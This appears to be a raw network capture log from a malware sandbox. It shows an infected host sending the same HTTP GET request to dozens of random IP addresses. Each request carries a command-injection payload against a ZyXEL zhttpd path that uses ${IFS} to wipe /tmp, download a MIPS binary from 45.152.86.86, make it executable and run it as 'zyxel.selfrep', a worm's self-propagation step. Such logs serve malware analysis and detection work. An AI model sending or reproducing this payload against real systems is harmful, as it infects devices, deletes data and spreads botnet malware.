                              Mar 31, 2024 08:41:26.846978903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4402192.168.2.136005884.210.57.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.847022057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4403192.168.2.136052440.19.10.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.847105980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4404192.168.2.1344020216.16.146.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.847210884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4405192.168.2.133879291.19.148.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.847218037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4406192.168.2.1357138204.168.8.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.847320080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4407192.168.2.1337894102.120.167.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.847354889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4408192.168.2.1335088175.8.20.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.847448111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4409192.168.2.133615239.20.122.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.847510099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4410192.168.2.1349108200.84.32.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.847570896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4411192.168.2.1351456167.87.192.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.847661018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4412192.168.2.1339782170.242.136.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.847726107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4413192.168.2.1335926221.41.71.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.847794056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4414192.168.2.1342216158.119.159.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.847865105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4415192.168.2.13514642.201.38.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.847923040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4416192.168.2.1335456140.154.90.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.847980022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4417192.168.2.134939468.155.174.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.848031044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4418192.168.2.1339468128.137.171.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.848104000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4419192.168.2.1351330137.32.95.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.848145008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4420192.168.2.133404824.120.59.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.848202944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4421192.168.2.136075263.207.27.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.848251104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4422192.168.2.1336598152.101.59.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.848320007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4423192.168.2.1335124205.32.139.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.848377943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4424192.168.2.133487439.56.33.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.848452091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4425192.168.2.1351426222.142.246.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.848484039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4426192.168.2.134725452.235.246.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.848558903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4427192.168.2.135631281.180.43.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.848582029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4428192.168.2.1333730140.55.106.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.848643064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4429192.168.2.134956696.171.70.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.848722935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4430192.168.2.134508486.131.19.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.848776102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4431192.168.2.1338816143.62.230.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.848848104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4432192.168.2.135974412.35.227.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.848889112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4433192.168.2.1344824151.148.151.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.848963976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4434192.168.2.1360762194.242.207.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.849004030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4435192.168.2.1344490148.242.54.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.849073887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4436192.168.2.1341188113.159.157.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.849109888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4437192.168.2.134370677.101.164.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.849154949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4438192.168.2.1346826100.220.60.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.849230051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4439192.168.2.1344562149.155.112.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.849307060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4440192.168.2.13587782.1.103.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.849339962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4441192.168.2.134116884.98.174.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.849396944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4442192.168.2.1340994189.135.196.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.849478960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4443192.168.2.133561854.239.105.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.849524021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4444192.168.2.135197661.3.141.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.849605083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4445192.168.2.1360920198.76.128.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.849626064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4446192.168.2.135234075.186.51.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.849698067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4447192.168.2.1343656131.66.136.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.849761009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4448192.168.2.133426080.67.148.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.849797010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4449192.168.2.1340124166.131.199.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.849880934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4450192.168.2.1333428222.31.150.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.849922895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4451192.168.2.1347570194.44.70.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.849960089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4452192.168.2.134819232.74.174.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.850029945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4453192.168.2.134033239.35.240.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.850126028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4454192.168.2.1341788186.188.249.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.850151062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4455192.168.2.1350316169.26.165.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.850189924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4456192.168.2.1345670193.254.127.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.850295067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4457192.168.2.134448483.100.245.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.850334883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4458192.168.2.1342508189.212.26.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.850394011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4459192.168.2.1346446166.133.234.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.850464106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4460192.168.2.1347400113.156.59.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.850522995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4461192.168.2.134855646.196.35.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.850572109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4462192.168.2.1335168211.40.187.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.850610971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4463192.168.2.1338670159.60.133.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.850718975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4464192.168.2.1335230153.67.68.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.850749016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4465192.168.2.133933675.19.107.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.850845098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4466192.168.2.1357344194.200.230.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.850883007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4467192.168.2.1360490147.147.198.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.850963116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4468192.168.2.1344776182.162.206.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.850990057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4469192.168.2.136022412.237.68.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.851047993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4470192.168.2.133936635.29.172.109443
                              TimestampBytes transferredDirectionData
